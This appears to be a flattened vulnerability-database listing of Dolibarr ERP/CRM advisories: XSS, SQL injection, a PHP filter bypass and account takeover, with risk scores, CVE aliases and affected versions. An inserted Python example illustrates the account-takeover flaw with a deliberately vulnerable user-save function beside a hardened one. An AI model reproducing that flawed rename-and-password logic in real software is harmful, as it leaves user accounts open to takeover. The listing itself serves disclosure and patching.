| scoring_elements |
0.82838 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.01735 |
| scoring_system |
epss |
| scoring_elements |
0.82839 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0819 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 7 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 8 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 9 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 10 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 11 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 12 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 13 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 14 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 15 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 16 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 17 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 18 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 19 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 20 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 21 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 22 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1 |
|
|
| aliases |
CVE-2022-0819, GHSA-42qm-c3cf-9wv2
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7qjh-teat-tqav |
|
| 20 |
| url |
VCID-7txt-x88q-2bej |
| vulnerability_id |
VCID-7txt-x88q-2bej |
| summary |
Dolibarr vulnerable to SQL Injection
Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters in /dolibarr/commande/list.php. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
|
| aliases |
CVE-2024-5315, GHSA-q8x7-jc3h-p8xc
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7txt-x88q-2bej |
|
| 21 |
| url |
VCID-8fjr-6hdm-vqdd |
| vulnerability_id |
VCID-8fjr-6hdm-vqdd |
| summary |
Dolibarr user with permission to edit PHP content can bypass filtering to restrict dangerous PHP functions
In the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. An authenticated user with permission to edit PHP content can bypass this filtering, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-31019, GHSA-j2g9-rprv-hrhc
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-8fjr-6hdm-vqdd |
|
| 22 |
| url |
VCID-9xkp-4t9p-eqbb |
| vulnerability_id |
VCID-9xkp-4t9p-eqbb |
| summary |
Cross-site Scripting
An issue was discovered in Dolibarr: there is stored XSS in `expensereport/card.php` in the expense reports plugin via the `comments` parameter, or via a public or private note. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16808 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.419 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.41957 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.41986 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00199 |
| scoring_system |
epss |
| scoring_elements |
0.41976 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16808 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2018-16808, GHSA-r3r5-fqfm-9wrh
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-9xkp-4t9p-eqbb |
|
| 23 |
| url |
VCID-b65k-vs97-63fj |
| vulnerability_id |
VCID-b65k-vs97-63fj |
| summary |
Cross-site Scripting
Dolibarr is vulnerable to XSS in `/exports/export.php`. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-19799 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84684 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84661 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84685 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.0218 |
| scoring_system |
epss |
| scoring_elements |
0.84689 |
| published_at |
2026-06-06T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-19799 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@8.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@8.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 21 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 22 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 23 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 24 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 25 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 26 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 27 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 28 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 29 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 30 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 31 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 32 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 33 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 34 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 35 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 36 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 37 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 38 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 39 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 40 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 41 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 42 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 43 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 44 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 45 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 46 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 47 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 48 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 49 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 50 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.4 |
|
|
| aliases |
CVE-2018-19799, GHSA-ggww-q2gv-m3g4
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-b65k-vs97-63fj |
|
| 24 |
| url |
VCID-d4uk-4adf-mba9 |
| vulnerability_id |
VCID-d4uk-4adf-mba9 |
| summary |
Dolibarr Improper Input Validation vulnerability
Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an authenticated user who lacks the required permission to read a database table containing customer data |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-4198, GHSA-48v2-596x-4jr9
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-d4uk-4adf-mba9 |
|
| 25 |
| url |
VCID-dph7-h5d5-gyct |
| vulnerability_id |
VCID-dph7-h5d5-gyct |
| summary |
Improper Authentication
Admin-level users can change other users' details, but the application fails to validate that the new `Login` name already exists when renaming a user's `Login`. This leads to complete account takeover of the victim user, because the password is overwritten for the victim user that has the same login name. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25956 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59262 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59307 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59315 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00372 |
| scoring_system |
epss |
| scoring_elements |
0.59312 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-25956 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@13.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 9 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 10 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 11 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 12 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 13 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 14 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 15 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 16 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 17 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 18 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 19 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 20 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 21 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 22 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 23 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 24 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 25 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 26 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 27 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 28 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 29 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 30 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 31 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 32 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 33 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 7 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 8 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 9 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 10 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 11 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 12 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 13 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 14 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 15 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 16 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 17 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 18 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 19 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 20 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 21 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 22 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 23 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 24 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 25 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 26 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 27 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 28 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 29 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 30 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 31 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 32 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0 |
|
|
| aliases |
CVE-2021-25956, GHSA-fjqg-w8g6-hhq8
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-dph7-h5d5-gyct |
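The account-takeover entry above (CVE-2021-25956) describes a rename of one user's `Login` to a name another user already holds, after which the victim's password is overwritten. The following is an added example, not Dolibarr's code: it assumes the bug shape in which the rename skips the uniqueness check and the password write is keyed by login rather than by the immutable user id (an assumption, since the advisory does not give the mechanism), and it puts the missing check beside it. The `users` table and its rows are constructed for the example.

```python
import sqlite3

# Constructed sample users; this is not Dolibarr's schema and the
# passwords are plain strings only because row targeting is the point.
SAMPLE_USERS = [
    (1, "alice", "pw-alice"),
    (2, "bob", "pw-bob"),
]


def make_user_db():
    """In-memory user table with NO uniqueness constraint on login."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return db


def password_of(db, uid):
    """Current password string stored for the account with this uid."""
    return db.execute("SELECT password FROM users WHERE uid = ?", (uid,)).fetchone()[0]


def save_user_vulnerable(db, uid, new_login, new_password):
    """Assumed shape of the bug: the rename is not checked against existing
    logins, and the password write is keyed by login, so once two rows share
    a login the second statement also hits the victim's row."""
    db.execute("UPDATE users SET login = ? WHERE uid = ?", (new_login, uid))
    db.execute("UPDATE users SET password = ? WHERE login = ?", (new_password, new_login))
    db.commit()


def save_user_hardened(db, uid, new_login, new_password):
    """Refuse a login already used by a different account, and key every
    write on the immutable uid rather than on the (mutable) login."""
    clash = db.execute(
        "SELECT COUNT(*) FROM users WHERE login = ? AND uid <> ?", (new_login, uid)
    ).fetchone()[0]
    if clash:
        raise ValueError("login already in use by another account")
    db.execute(
        "UPDATE users SET login = ?, password = ? WHERE uid = ?",
        (new_login, new_password, uid),
    )
    db.commit()


def rename_rejected(db, uid, new_login, new_password):
    """True if the hardened save refuses the rename with ValueError."""
    try:
        save_user_hardened(db, uid, new_login, new_password)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_user_db()
    save_user_vulnerable(db, 2, "alice", "pw-attacker")  # admin renames bob -> alice
    print(password_of(db, 1))                             # alice's password is now pw-attacker
```

The application-level check is what the advisory says is missing; a `UNIQUE` constraint on the login column is the schema-level backstop that makes the duplicate impossible even if a future code path forgets the check.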
|
| 26 |
| url |
VCID-e39t-gvd4-j7ag |
| vulnerability_id |
VCID-e39t-gvd4-j7ag |
| summary |
Cross-site Scripting
Dolibarr ERP/CRM allows XSS via the `qty` parameter to `product/fournisseurs.php` (product price screen). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19212 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78865 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78889 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78899 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.01154 |
| scoring_system |
epss |
| scoring_elements |
0.78892 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19212 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
